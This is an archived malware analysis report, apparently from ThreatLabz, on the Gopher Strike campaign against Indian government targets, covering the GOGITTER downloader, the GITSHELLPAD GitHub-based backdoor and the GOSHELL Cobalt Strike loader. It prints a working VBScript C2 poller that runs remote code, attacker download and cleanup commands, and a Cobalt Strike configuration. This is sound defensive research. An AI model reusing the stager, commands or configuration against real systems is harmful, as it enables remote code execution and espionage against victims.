{
	"id": "eff33807-18de-4ac6-92df-7ff0875402f4",
	"created_at": "2026-04-06T00:09:38.208427Z",
	"updated_at": "2026-04-10T03:24:23.757471Z",
	"deleted_at": null,
	"sha1_hash": "43d5bc8cc6248cfd43889c677e7cdb1cf023a624",
	"title": "GOGITTER, GITSHELLPAD, and GOSHELL Analysis | ThreatLabz",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 507802,
	"plain_text": "GOGITTER, GITSHELLPAD, and GOSHELL Analysis | ThreatLabz\r\nBy Sudeep Singh, Yin Hong Chang\r\nPublished: 2026-01-26 · Archived: 2026-04-05 21:05:29 UTC\r\nTechnical Analysis\r\nIn the following sections, ThreatLabz discusses the technical details of the Gopher Strike campaign, including how the GOGITTER downloader functions, the role of the GITSHELLPAD backdoor for C2 communication, and the deployment of a Cobalt Strike Beacon using GOSHELL.\r\nGopher Strike campaign attack flow\r\nThe figure below shows the attack flow that leads to the deployment of Cobalt Strike.\r\nFigure 1: Shows how the Gopher Strike campaign leads to the deployment of Cobalt Strike.\r\nInitial infection vector\r\nhttps://www.zscaler.com/blogs/security-research/apt-attacks-target-indian-government-using-gogitter-gitshellpad-and-goshell\r\nPage 1 of 9\r\nThreatLabz traced the origins of the Gopher Strike campaign to multiple PDFs presumably sent in spear phishing emails. These PDFs contain a malicious link and a blurred image of legitimate documents that would be of interest to the victim. The image is designed to trick victims into downloading a fake Adobe Acrobat update to access the document's contents. The dialog is presented as a button labeled Download and Install, as shown in the figure below.\r\nFigure 2: Example of a PDF file used in the Gopher Strike campaign.\r\nIf the victim clicks the button, an ISO file containing the malicious payload is downloaded. During analysis, ThreatLabz observed that the servers hosting the payload only respond with the ISO file when accessed from IP addresses in India, with a User-Agent header representing a Windows platform. These server-side checks prevent automated URL analysis tools from fetching the ISO file, ensuring that the malicious file is only delivered to intended targets.\r\nGOGITTER downloader\r\nGOGITTER is a previously undocumented lightweight 64-bit Golang-based downloader. The following sections outline the key functionalities of the downloader.\r\nGOGITTER sequentially checks for the existence of the VBScript file windows_api.vbs in the following locations:\r\nC:\\Users\\Public\\Downloads\r\nC:\\Users\\Public\\Pictures\r\n%APPDATA%\r\nIf the VBScript is not found in any of the locations above, GOGITTER attempts to create a new file named windows_api.vbs in the first accessible location. The contents of this VBScript are stored in plaintext within the binary.\r\nThe contents of the VBScript file windows_api.vbs are included below.\r\nDim objHTTP, lastresponse, name, primaryURL, fallbackURL\r\nSet objHTTP = CreateObject(\"MSXML2.ServerXMLHTTP\")\r\nname = CreateObject(\"WScript.Network\").ComputerName\r\nprimaryURL = \"hxxps[:]//govt-filesharing[.]site/hpc5985.php?key=xvnd54\u0026info=Hello\" \u0026 name\r\nfallbackURL = \"hxxp[:]//ingov.myartsonline[.]com/hpc5985.php?key=xvnd54\u0026info=Hello\" \u0026 name\r\nlastresponse = \"\"\r\n' Fetch a URL with a browser-like User-Agent; returns the body on HTTP 200, otherwise an empty string\r\nFunction GetResponse(url)\r\n On Error Resume Next\r\n objHTTP.Open \"GET\", url, False\r\n objHTTP.setRequestHeader \"User-Agent\", \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\"\r\n objHTTP.setRequestHeader \"Accept-Charset\", \"UTF-8\"\r\n objHTTP.setRequestHeader \"Accept-Language\", \"en-US,en;q=0.5\"\r\n objHTTP.Send\r\n If objHTTP.Status = 200 Then\r\n GetResponse = objHTTP.responseText\r\n Else\r\n GetResponse = \"\"\r\n End If\r\n On Error GoTo 0\r\nEnd Function\r\n' Poll the primary C2 every 30 seconds, falling back to the secondary URL; a new response prefixed with \"hi \" is executed as VBScript\r\nDo\r\n responsebody = GetResponse(primaryURL)\r\n If responsebody = \"\" Then responsebody = GetResponse(fallbackURL)\r\n If responsebody <> \"\" And responsebody <> lastresponse Then\r\n If Left(responsebody, 3) = \"hi \" Then\r\n Execute Mid(responsebody, 4)\r\n lastresponse = responsebody\r\n End If\r\n End If\r\n WScript.Sleep 30000\r\nLoop\r\nThis newly-created VBScript contains two pre-configured C2 URLs that are used to fetch VBScript commands every 30 seconds. The VBScript connects to the primary URL with a hardcoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 and two more pre-configured HTTP headers.\r\nIf the response from the C2 server begins with the string hi , the remainder of the response is treated as VBScript code and executed.\r\nIf the response from the primary URL is empty, the script retrieves the secondary URL.\r\nTo achieve persistence, a scheduled task is created with a dynamic name (MicrosoftEdge_ConfigurationUpdate_\u003c__random__\u003e) where a random four-digit number is generated at runtime. This task is configured to execute the dropped windows_api.vbs script every 50 minutes.\r\nGOGITTER checks for the presence of the ZIP archive adobe_update.zip in the aforementioned locations in the same manner. If the file is not present, GOGITTER downloads a file named adobe_update.zip from the private threat actor-controlled GitHub repository at hxxps[:]//raw.githubusercontent[.]com/jaishankai/sockv6/main/adobe_update.zip. A GitHub authentication token embedded in the binary is used to authenticate and download the archive from the private repository. The contents of adobe_update.zip are extracted to one of the three installation folder locations, dropping the executable edgehost.exe and a zero-byte text document.\r\nGOGITTER then sends an HTTP GET request to the URL adobe-acrobat[.]in/ninevmc987.php?file=bncoeeav34564cvv94adfavc3354334dfsf, most likely to signal that the endpoint has been successfully infected.\r\nGITSHELLPAD backdoor\r\nThe edgehost.exe file is GITSHELLPAD, a 64-bit lightweight Golang-based backdoor that leverages threat actor-controlled private GitHub repositories for its C2 communication. The backdoor registers the victim with the C2 server, and polls the C2 for commands to execute. GITSHELLPAD uses GitHub’s REST API to create a new directory in the threat actor-controlled GitHub repository with the format: SYSTEM- . GITSHELLPAD then adds the file info.txt into this new directory and commits the changes to the main branch. The info.txt file contains the Base64-encoded string: PC Name: SYSTEM- .\r\nGITSHELLPAD polls the threat actor-controlled GitHub account for new commands every 15 seconds by sending a GET request to the GitHub REST Contents API endpoint for the file command.txt. If GITSHELLPAD is unable to connect to GitHub to fetch command.txt, it retries every 8 seconds. If the contents of command.txt are empty, then GITSHELLPAD retries to fetch the content after 7 seconds.\r\nOnce the command.txt file is successfully fetched, its contents are Base64-decoded to retrieve the command string. The table below shows the commands supported by GITSHELLPAD.\r\nCommand - Description\r\ncd .. - Change working directory to parent directory.\r\ncd - Change directory to the specified path.\r\nrun - Run command in the background but don't capture the output.\r\nupload - Upload the local file specified by the path to the GitHub repo.\r\ndownload - Download a file to the specified path.\r\nDefault case - Execute the command using cmd /c and capture the output.\r\nTable 1: Commands supported by GITSHELLPAD.\r\nAll the logging messages detailing the command status and output are captured in the result.txt file and uploaded to the threat actor's GitHub account via a PUT request. The command.txt file is deleted from the threat actor-controlled GitHub repository after successful command execution on the endpoint.\r\nDuring the investigation, ThreatLabz discovered four threat actor-controlled private GitHub repositories and observed more than 200 post-compromise commands issued by the threat actor. The table below lists a subset of the post-compromise commands observed by ThreatLabz.\r\nCategory - Description (sample commands are listed beneath each row)\r\nUser reconnaissance - Collects information about the user.\r\n net user\r\n whoami\r\nSystem and network reconnaissance - Collects information about the system and network configuration.\r\n systeminfo\r\n arp -a\r\n curl ifconfig.me/ip\r\n wmic logicaldisk get name\r\nNetwork connectivity check - Checks connectivity to the C2 server.\r\n curl -I https://adobe-acrobat[.]in\r\nDownload post-compromise tools - Downloads an archive to the victim’s filesystem.\r\n curl -L -o a.rar hxxps[:]//adobe-acrobat[.]in/a.rar\r\nClear filesystem traces - Deletes filesystem artifacts.\r\n del /f /q svchost.rar\r\nClear running process traces - Kills GITSHELLPAD related processes.\r\n tasklist | findstr CLEANUP\r\n taskkill /F /PID 10572\r\nArchive extraction - Extracts the contents of a downloaded archive.\r\n tar -xvf svchost.rar\r\nTable 2: A list of commands issued by the threat actor during the attack campaign. These commands are executed using the GITSHELLPAD payload.\r\nA complete list of post-compromise commands is available in the ThreatLabz GitHub repository.\r\nGOSHELL loader\r\nAfter the threat actor gained access to the victim’s machine, ThreatLabz observed them downloading RAR archives containing post-compromise tools. The threat actors used the cURL commands shown in the table above to perform these downloads. The archives included tools that collect information from the compromised system. The threat actor also utilized GOSHELL, a custom-built Golang-based loader, to deploy a Cobalt Strike Beacon. Once the RAR archives were downloaded, they were extracted using the tar utility, and the tools were deleted after use. In this analysis, we focus only on the primary backdoor that was deployed.\r\nGOSHELL’s size was artificially inflated to approximately 1 gigabyte by adding junk bytes to the Portable Executable (PE) overlay, likely to evade detection by antivirus software. These junk bytes were not entirely random but consisted of repeated byte sequences, such as:\r\nNull bytes\r\nSECURITY123456COMPRESSME!\r\n{AB CD EF 90 90 41 42 43 44 45 CC DE AD BE EF 00 FF 11 22 33}\r\nGOSHELL undergoes multiple decoding stages before eventually loading Cobalt Strike Beacon.\r\nGOSHELL only executes on specific hostnames by comparing the victim's hostname against a hardcoded list. If no match is found, GOSHELL exits.\r\nIf a match is found, GOSHELL proceeds to decode the embedded second-stage shellcode. GOSHELL will:\r\n1. HEX-decode an embedded string and XOR the resulting bytes with 0xAA.\r\n2. Sleep for a random interval between three and seven seconds.\r\n3. Execute the second-stage shellcode within the same process using QueueUserAPC.\r\nThis 32-bit second-stage shellcode is executed by the QueueUserAPC call. It performs another layer of decoding. The main purpose of the second-stage shellcode is to decrypt and load the next-stage Cobalt Strike payload. Below are its key functionalities.\r\nAllocates executable memory.\r\nParses the PE header to extract the 4-byte XOR key 0x51211104.\r\nCopies the next-stage encrypted shellcode to executable memory.\r\nDecrypts the encrypted shellcode using the 4-byte XOR key.\r\nInvokes the entry point of the next-stage shellcode.\r\nStage 3 is the final decoded payload, a stageless Cobalt Strike Beacon. ThreatLabz extracted the configuration, which appears to have been modified from a public profile.\r\nThe Cobalt Strike configuration is shown below.\r\nBeaconType - HTTPS\r\nPort - 443\r\nSleepTime - 45000\r\nMaxGetSize - 2801745\r\nJitter - 30\r\nMaxDNS - Not Found\r\nPublicKey_MD5 - 2e4e4ea817ad2286616f809ca84fc932\r\nC2Server - d18c3nlvb0n2a6.cloudfront.net,/jquery-3.3.1.min.js\r\nUserAgent - Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko\r\nHttpPostUri - /jquery-3.3.2.min.js\r\nMalleable_C2_Instructions - Remove 1522 bytes from the end\r\n Remove 84 bytes from the beginning\r\n Remove 3931 bytes from the beginning\r\n Base64 URL-safe decode\r\n XOR mask w/ random key\r\nHttpGet_Metadata - ConstHeaders\r\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n Referer: http://code.jquery.com/\r\n Accept-Encoding: gzip, deflate\r\n Metadata\r\n base64url\r\n prepend \"__cfduid=\"\r\n header \"Cookie\"\r\nHttpPost_Metadata - ConstHeaders\r\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n Referer: http://code.jquery.com/\r\n Accept-Encoding: gzip, deflate\r\n SessionId\r\n mask\r\n base64url\r\n parameter \"__cfduid\"\r\n Output\r\n mask\r\n base64url\r\n print\r\nPipeName - Not Found\r\nDNS_Idle - Not Found\r\nDNS_Sleep - Not Found\r\nSSH_Host - Not Found\r\nSSH_Port - Not Found\r\nSSH_Username - Not Found\r\nSSH_Password_Plaintext - Not Found\r\nSSH_Password_Pubkey - Not Found\r\nSSH_Banner -\r\nHttpGet_Verb - GET\r\nHttpPost_Verb - POST\r\nHttpPostChunk - 0\r\nSpawnto_x86 - %windir%\\syswow64\\dllhost.exe\r\nSpawnto_x64 - %windir%\\sysnative\\dllhost.exe\r\nCryptoScheme - 0\r\nProxy_Config - Not Found\r\nProxy_User - Not Found\r\nProxy_Password - Not Found\r\nProxy_Behavior - Use IE settings\r\nWatermark_Hash - NtZOV6JzDr9QkEnX6bobPg==\r\nWatermark - 987654321\r\nbStageCleanup - True\r\nbCFGCaution - False\r\nKillDate - 0\r\nbProcInject_StartRWX - False\r\nbProcInject_UseRWX - False\r\nbProcInject_MinAllocSize - 17500\r\nProcInject_PrependAppend_x86 - b'\\x90\\x90'\r\n Empty\r\nProcInject_PrependAppend_x64 - b'\\x90\\x90'\r\n Empty\r\nProcInject_Execute - ntdll:RtlUserThreadStart\r\n CreateThread\r\n NtQueueApcThread-s\r\n CreateRemoteThread\r\n RtlCreateUserThread\r\nProcInject_AllocationMethod - NtMapViewOfSection\r\nbUsesCookies - True\r\nHostHeader -\r\nheadersToRemove - Not Found\r\nDNS_Beaconing - Not Found\r\nDNS_get_TypeA - Not Found\r\nDNS_get_TypeAAAA - Not Found\r\nDNS_get_TypeTXT - Not Found\r\nDNS_put_metadata - Not Found\r\nDNS_put_output - Not Found\r\nDNS_resolver - Not Found\r\nDNS_strategy - round-robin\r\nDNS_strategy_rotate_seconds - -1\r\nDNS_strategy_fail_x - -1\r\nDNS_strategy_fail_seconds - -1\r\nRetry_Max_Attempts - 0\r\nRetry_Increase_Attempts - 0\r\nRetry_Duration - 0\r\nSource: https://www.zscaler.com/blogs/security-research/apt-attacks-target-indian-government-using-gogitter-gitshellpad-and-goshell",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.zscaler.com/blogs/security-research/apt-attacks-target-indian-government-using-gogitter-gitshellpad-and-goshell"
	],
	"report_names": [
		"apt-attacks-target-indian-government-using-gogitter-gitshellpad-and-goshell"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434178,
	"ts_updated_at": 1775791463,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/43d5bc8cc6248cfd43889c677e7cdb1cf023a624.pdf",
		"text": "https://archive.orkl.eu/43d5bc8cc6248cfd43889c677e7cdb1cf023a624.txt",
		"img": "https://archive.orkl.eu/43d5bc8cc6248cfd43889c677e7cdb1cf023a624.jpg"
	}
}